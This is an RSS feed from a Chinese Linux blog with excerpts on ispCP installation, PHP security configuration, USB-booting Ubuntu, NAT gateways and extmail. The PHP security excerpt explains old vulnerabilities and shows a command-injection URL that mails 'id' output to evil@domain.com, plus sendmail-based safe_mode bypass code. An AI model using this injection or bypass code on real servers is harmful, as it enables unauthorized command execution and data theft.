<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>普小龙-Blog QQ:47900026</title>
	<atom:link href="http://www.xpv.cn/feed" rel="self" type="application/rss+xml" />
	<link>http://www.xpv.cn</link>
	<description>linux爱好者聚集群47160022  -起用新平台</description>
	<lastBuildDate>Sun, 20 Feb 2011 16:19:55 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Debian安装ispCP</title>
		<link>http://www.xpv.cn/home/debiananzhuangispcp.html</link>
		<comments>http://www.xpv.cn/home/debiananzhuangispcp.html#comments</comments>
		<pubDate>Sun, 20 Feb 2011 16:18:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[ispcp bbs]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[ispCP]]></category>

		<guid isPermaLink="false">http://www.xpv.cn/?p=715</guid>
		<description><![CDATA[Debian安装ispCP
<script type="text/javascript">SHARETHIS.addEntry({ title: "Debian安装ispCP", url: "http://www.xpv.cn/home/debiananzhuangispcp.html" });</script>]]></description>
		<wfw:commentRss>http://www.xpv.cn/home/debiananzhuangispcp.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Centos5.4安装ispCP官方指导</title>
		<link>http://www.xpv.cn/home/centos5-4anzhuangispcpguanfangzhidao.html</link>
		<comments>http://www.xpv.cn/home/centos5-4anzhuangispcpguanfangzhidao.html#comments</comments>
		<pubDate>Sun, 20 Feb 2011 16:16:53 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[ispcp bbs]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[ispCP]]></category>

		<guid isPermaLink="false">http://www.xpv.cn/?p=713</guid>
		<description><![CDATA[Centos5.4安装ispCP官方指导 _ 参考
 





From： http://www.isp-control.net/documentation/doku.php?id=start:installation:centos
1.安装前准备 
1.1确保Centos是最新的
以超级用户登路，先关闭fastestmirror
[root@server ~]# vi /etc/yum/pluginconf.d/fastestmirror.conf
设置 “enable=0”
[root@server ~]# cd /etc/yum.repos.d/
[root@server yum.repos.d]# wget http://mirrors.163.com/.help/CentOS-Base-163.repo
[root@server yum.repos.d]# yum makecache
[root@server yum.repos.d]# yum update
1.2 添加额外的软件源
Epel源(Extra Packages for Enterprise Linux）
[root@server yum.repos.d]# rpm -Uvh http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-4.noarch.rpm
[root@server yum.repos.d]# yum install foo
对于x86_64 位系统可以执行以下命令：
[root@server yum.repos.d]# rpm -Uvh http://download.fedora.redhat.com/pub/epel/5/x86_64/epel-release-5-4.noarch.rpm
[root@server yum.repos.d]# yum install foo
Les RPM de Remi源
[root@server yum.repos.d]# cd /etc/yum.repos.d
[root@server yum.repos.d]# wget http://rpms.famillecollet.com/remi-enterprise.repo
这个源里包含一些不需要的软件包，通过以下命令去掉它们
[root@server yum.repos.d]# vi /etc/yum.repos.d/remi-enterprise.repo
在[remi]段结尾,[remi-test]段之上添加一句
includepkgs=mysql* [...]<script type="text/javascript">SHARETHIS.addEntry({ title: "Centos5.4安装ispCP官方指导", url: "http://www.xpv.cn/home/centos5-4anzhuangispcpguanfangzhidao.html" });</script>]]></description>
		<wfw:commentRss>http://www.xpv.cn/home/centos5-4anzhuangispcpguanfangzhidao.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ispcp</title>
		<link>http://www.xpv.cn/home/ispcp.html</link>
		<comments>http://www.xpv.cn/home/ispcp.html#comments</comments>
		<pubDate>Sun, 20 Feb 2011 15:24:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[ispcp bbs]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[ispCP]]></category>

		<guid isPermaLink="false">http://www.xpv.cn/?p=708</guid>
		<description><![CDATA[IspCP 是一个致力于控制多台服务器、虚拟主机的控制面板开源项目。直到最终版本被时间淘汰掉。该控制面板适合任何 互联网接入服务提供商（ISP）。<script type="text/javascript">SHARETHIS.addEntry({ title: "ispcp", url: "http://www.xpv.cn/home/ispcp.html" });</script>]]></description>
		<wfw:commentRss>http://www.xpv.cn/home/ispcp.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PHP安全配置</title>
		<link>http://www.xpv.cn/home/phpanquanpeizhi.html</link>
		<comments>http://www.xpv.cn/home/phpanquanpeizhi.html#comments</comments>
		<pubDate>Thu, 21 May 2009 00:44:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[安全(safe)]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[配置]]></category>

		<guid isPermaLink="false">http://www.xpv.cn/?p=701</guid>
		<description><![CDATA[期：2005-06-25 02:42:44  来源：不详
PHP安全配置
一、Web服务器安全
PHP其实不过是Web服务器的一个模块功能，所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全，这样就扯远了，无穷无尽。PHP可以和各种Web服务器结合，这里也只讨论Apache。非常建议以chroot方式安装启动Apache，这样即使Apache和PHP及其脚本出现漏洞，受影响的也只有这个禁锢的系统，不会危害实际系统。但是使用chroot的Apache后，给应用也会带来一定的麻烦，比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接，这在效率上会稍微差一点。还有mail函数发送邮件也是个问题，因为php.ini里的： 
[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = me@localhost.com
都是针对Win32平台，所以需要在chroot环境下调整好sendmail。
二、PHP本身问题
1、远程溢出
PHP-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞，而且攻击程序已经广泛流传，成功率非常高.
2、远程拒绝服务
PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST请求处理远程漏洞，虽然不能获得本地用户权限，但是也能造成拒绝服务。
3、safe_mode绕过漏洞
还有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函数绕过safe_mode限制执行命令漏洞，4.0.5版本开始mail函数增加了第五个参数，由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单，只需用分号隔开后面加shell命令就可以了，比如存在PHP脚本evil.php： 
执行如下的URL：
http://foo.com/evil.php?bar=;/usr/bin/idmail evil@domain.com
这将id执行的结果发送给evil@domain.com。
对于4.0.6至4.2.2的PHP突破safe_mode限制其实是利用了sendmail的-C参数，所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令：
#注意，下面这两个必须是不存在的，
或者它们的属主和本脚本的属主是一样
$script=&#8221;/tmp/script123&#8243;;
$cf=&#8221;/tmp/cf123&#8243;;
$fd = fopen($cf, &#8220;w&#8221;);
fwrite($fd, &#8220;OQ/tmp
Sparse=0
R$*&#8221; . chr(9) . &#8220;$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script&#8221;);
fclose($fd);
$fd = fopen($script, &#8220;w&#8221;);
fwrite($fd, &#8220;rm -f $script $cf; &#8220;);
fwrite($fd, $cmd);
fclose($fd);
mail(&#8221;nobody&#8221;, &#8220;&#8221;, &#8220;&#8221;, &#8220;&#8221;, &#8220;-C$cf&#8221;);
?>
还是使用以上有问题版本PHP的用户一定要及时升级到最新版本，这样才能消除基本的安全问题。
三、PHP本身的安全配置 
PHP的配置非常灵活，可以通过php.ini, httpd.conf, .htaccess文件（该目录必须设置了AllowOverride All或Options）进行设置，还可以在脚本程序里使用ini_set()及其他的特定的函数进行设置。通过phpinfo()和get_cfg_var()函数可以得到配置选项的各个值。
如果配置选项是唯一PHP_INI_SYSTEM属性的，必须通过php.ini和httpd.conf来修改，它们修改的是PHP的Master值，但修改之后必须重启apache才能生效。其中php.ini设置的选项是对Web服务器所有脚本生效，httpd.conf里设置的选项是对该定义的目录下所有脚本生效。
如果还有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL属性的选项就可以使用.htaccess文件设置，也可以通过在脚本程序自身用ini_set()函数设定，它们修改的是Local值，改了以后马上生效。但是.htaccess只对当前目录的脚本程序生效，ini_set()函数只对该脚本程序设置ini_set()函数以后的代码生效。各个版本的选项属性可能不尽相同，可以用如下命令查找当前源代码的main.c文件得到所有的选项，以及它的属性：
# grep PHP_INI_ [...]<script type="text/javascript">SHARETHIS.addEntry({ title: "PHP安全配置", url: "http://www.xpv.cn/home/phpanquanpeizhi.html" });</script>]]></description>
		<wfw:commentRss>http://www.xpv.cn/home/phpanquanpeizhi.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>通过 USB 安装 Ubuntu/Linux</title>
		<link>http://www.xpv.cn/home/%e9%80%9a%e8%bf%87-usb-%e5%ae%89%e8%a3%85-ubuntulinux.html</link>
		<comments>http://www.xpv.cn/home/%e9%80%9a%e8%bf%87-usb-%e5%ae%89%e8%a3%85-ubuntulinux.html#comments</comments>
		<pubDate>Sat, 09 May 2009 11:12:36 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[system]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[ubuntu适用程序]]></category>
		<category><![CDATA[GgNET]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[系统维护]]></category>

		<guid isPermaLink="false">http://www.xpv.cn/?p=699</guid>
		<description><![CDATA[通过 USB 安装 Ubuntu/Linux <script type="text/javascript">SHARETHIS.addEntry({ title: "通过 USB 安装 Ubuntu/Linux", url: "http://www.xpv.cn/home/%e9%80%9a%e8%bf%87-usb-%e5%ae%89%e8%a3%85-ubuntulinux.html" });</script>]]></description>
		<wfw:commentRss>http://www.xpv.cn/home/%e9%80%9a%e8%bf%87-usb-%e5%ae%89%e8%a3%85-ubuntulinux.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>5分钟打造U盘启动的Ubuntu</title>
		<link>http://www.xpv.cn/home/5fenzhongdazaoupanqidongdeubuntu.html</link>
		<comments>http://www.xpv.cn/home/5fenzhongdazaoupanqidongdeubuntu.html#comments</comments>
		<pubDate>Thu, 16 Apr 2009 02:26:51 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[ubuntu]]></category>
		<category><![CDATA[U盘]]></category>
		<category><![CDATA[启动]]></category>

		<guid isPermaLink="false">http://www.xpv.cn/?p=669</guid>
		<description><![CDATA[5分钟打造U盘启动的Ubuntu

时间:2008-12-18 00:00来源:中国网管联盟 作者:bitsCN整理

想拥有一个可以随身携带的操作系统?你可以考虑将它安装到U盘驱动器上。很早开始在USB磁盘上运行Linux发行版已经成为可能的，只是这个制作过程 嘛，有点麻烦。为什么？因为那意味着你需要在命令行中敲一大堆极客们（Geekers）才会用到的命令，并且，如果你不慎敲错了了其中一行，对不起，请你 重头来过。更要命的是，不花费一两个小时，你是没法将它安装到USB盘上的。不过，本篇教程将教你如何在5分钟内将Linux操作系统安装到U盘上，打造 你自己的Linux魔法棒。这需要使用一个名叫UNetbootin的奇妙软件。

我们已经用本教程成功地将Ubuntu 8.04.1 LTS 和BackTrack 3 这两个Linux发行版成功地安装到一个1GB的金士顿DataTraveler 2.0 USB闪存盘上了。 
 
其它可供选择的Linux发行版本包括：

· Arch Linux

· BackTrack

· CentOS

· CloneZilla

· Damn Small Linux

· Debian

· Dreamlinux

· Elive

· FaunOS

· Fedora

· FreeBSD

· FreeDOS

· Frugalware

· Gentoo

· Gujin

· Kubuntu

· Linux Mint

· Mandriva

· NetBSD

· NTPasswd

· openSUSE

· Ophcrack

· Parted Magic

· PCLinuxOS

· Puppy Linux

· Slax

· SliTaZ

· Smart Boot Manager

· Super Grub Disk

· Ubuntu feedom.net

· [...]<script type="text/javascript">SHARETHIS.addEntry({ title: "5分钟打造U盘启动的Ubuntu", url: "http://www.xpv.cn/home/5fenzhongdazaoupanqidongdeubuntu.html" });</script>]]></description>
		<wfw:commentRss>http://www.xpv.cn/home/5fenzhongdazaoupanqidongdeubuntu.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>RedHat 9上用iptables做NAT网关</title>
		<link>http://www.xpv.cn/home/redhat9shangyongiptableszuonatwangguan.html</link>
		<comments>http://www.xpv.cn/home/redhat9shangyongiptableszuonatwangguan.html#comments</comments>
		<pubDate>Tue, 17 Feb 2009 08:49:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[iptables]]></category>
		<category><![CDATA[网关]]></category>
		<category><![CDATA[设置]]></category>

		<guid isPermaLink="false">http://www.xpv.cn/?p=649</guid>
		<description><![CDATA[RedHat 9上用iptables做NAT网关
一、将下列内容加入/etc/rc.local文件中：
注：eth0绑内网IP eth1绑外网IP
################
[root@RHNAT01 root]# vi /etc/rc.local
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don’t
# want to do the full Sys V style init stuff.
touch /var/lock/subsys/local
route add -net 0.0.0.0 gw 外网网关 netmask 0.0.0.0 dev eth1
route add -net 内网网段A gw 内网网关 netmask [...]<script type="text/javascript">SHARETHIS.addEntry({ title: "RedHat 9上用iptables做NAT网关", url: "http://www.xpv.cn/home/redhat9shangyongiptableszuonatwangguan.html" });</script>]]></description>
		<wfw:commentRss>http://www.xpv.cn/home/redhat9shangyongiptableszuonatwangguan.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>安装extmail心得</title>
		<link>http://www.xpv.cn/home/anzhuangextmailxinde.html</link>
		<comments>http://www.xpv.cn/home/anzhuangextmailxinde.html#comments</comments>
		<pubDate>Tue, 17 Feb 2009 03:33:48 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[mail]]></category>
		<category><![CDATA[extmail]]></category>
		<category><![CDATA[安装]]></category>
		<category><![CDATA[心得]]></category>

		<guid isPermaLink="false">http://www.xpv.cn/?p=647</guid>
		<description><![CDATA[安装extmail心得
来自kgdvoau的 blog
2008-09-06 21:43
学习疯狂老头的blog(http://blog.redzone.com.cn安装extmail心得
原文链接,第一部分:http://blog.redzone.com.cn/read.php/35.htm
第二部分http://blog.redzone.com.cn/read.php/36.htm
第三部分http://blog.redzone.com.cn/read.php/37.htm
照着疯狂老头的blog在CENTOS5上安装extmail,别的地方都一切正常.但是也出现了几个小问题.
第2部分里面编辑 authmysqlrc 文件：
MYSQL_SERVER localhost
MYSQL_USERNAME extmail
MYSQL_PASSWORD extmail
MYSQL_SOCKET /tmp/mysql.sock （注意这里哦！）
mysql的socket路径应该是/var/lib/mysql/mysql.sock
第3部分,maildrop 测试账号,疯狂老头的文章中说用test@extmail.org这个用户.但是没有这个用户,因此
用系统自带的postmaster@extmail.org测试通过
用老头的命令maildrop -V 10 -d postmaster@extmail.org会卡住.需要手动按ctrl+c结束.
也可以用echo test&#124; maildrop -V 10 -d postmaster@extmail.org来测试.更加完整的过程.
如果出现认证失败maildrop: Temporary authentication failure..检查/var/log/maillog发现是无法连接
数据库
Jan 5 14:11:18 localhost authdaemond: received userid lookup request: postmaster@extmail.org
Jan 5 14:11:18 localhost authdaemond: authmysql: trying this module
Jan 5 14:11:18 localhost maildrop[30991]: Temporary authentication failure.
Jan 5 14:11:18 localhost authdaemond: failed to connect [...]<script type="text/javascript">SHARETHIS.addEntry({ title: "安装extmail心得", url: "http://www.xpv.cn/home/anzhuangextmailxinde.html" });</script>]]></description>
		<wfw:commentRss>http://www.xpv.cn/home/anzhuangextmailxinde.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux操作系统的安全配置精讲</title>
		<link>http://www.xpv.cn/home/linuxcaozuoxitongdeanquanpeizhijingjiang.html</link>
		<comments>http://www.xpv.cn/home/linuxcaozuoxitongdeanquanpeizhijingjiang.html#comments</comments>
		<pubDate>Fri, 09 Jan 2009 05:06:22 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[安全(safe)]]></category>
		<category><![CDATA[安全]]></category>
		<category><![CDATA[操作系统]]></category>
		<category><![CDATA[配置]]></category>

		<guid isPermaLink="false">http://www.xpv.cn/?p=616</guid>
		<description><![CDATA[Linux操作系统的安全配置精讲<script type="text/javascript">SHARETHIS.addEntry({ title: "Linux操作系统的安全配置精讲", url: "http://www.xpv.cn/home/linuxcaozuoxitongdeanquanpeizhijingjiang.html" });</script>]]></description>
		<wfw:commentRss>http://www.xpv.cn/home/linuxcaozuoxitongdeanquanpeizhijingjiang.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>自动备份数据库</title>
		<link>http://www.xpv.cn/home/zidongbeifenshujuku.html</link>
		<comments>http://www.xpv.cn/home/zidongbeifenshujuku.html#comments</comments>
		<pubDate>Thu, 08 Jan 2009 02:40:32 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[mysql]]></category>
		<category><![CDATA[备份]]></category>
		<category><![CDATA[Cron]]></category>
		<category><![CDATA[数据库]]></category>
		<category><![CDATA[自动]]></category>

		<guid isPermaLink="false">http://www.xpv.cn/?p=612</guid>
		<description><![CDATA[自动备份数据库<script type="text/javascript">SHARETHIS.addEntry({ title: "自动备份数据库", url: "http://www.xpv.cn/home/zidongbeifenshujuku.html" });</script>]]></description>
		<wfw:commentRss>http://www.xpv.cn/home/zidongbeifenshujuku.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

